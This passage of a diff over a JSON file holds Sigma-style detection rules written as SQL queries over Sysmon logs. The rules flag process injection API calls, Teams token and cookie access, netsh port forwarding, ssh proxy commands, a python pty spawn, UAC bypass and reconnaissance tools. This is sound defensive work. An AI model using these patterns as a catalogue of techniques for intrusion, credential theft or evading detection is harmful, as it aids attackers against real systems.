'%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR 
CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", + "title": "Use of Wfc.exe", + "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "status": "experimental", - "description": "Detect usage of the 
\"ssh.exe\" binary as a proxy to launch other programs", - "author": "frack113, Nasreddine Bencherchali", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.discovery" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "status": "experimental", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. 
This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new 
chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - 
"status": "test", - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects 
the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ "attack.discovery", - "attack.t1082" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Share And Session Enumeration Using Net.EXE", - "id": "62510e69-616b-4078-b371-847da438cc03", - "status": "stable", - "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", - "author": "Endgame, JHasenbusch (ported for oscd.community)", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.communitly", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "falsepositives": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
+ ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + }, + { + "title": "Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "status": "experimental", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use of net.exe utility by legitimate user" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_and_sessions_enum.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian 
Roth (Nextron Systems), Tigzy", - "tags": [ - "attack.collection", - "attack.t1560.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF 
scripts\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", - "status": "experimental", - "description": "Detects suspicious aged 
finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "The process spawned by vsjitdebugger.exe is uncommon." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - 
"author": "Nikita Nazarov, oscd.community", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate audio capture by legitimate user." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Legitimate import of keys", + "Evernote" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": 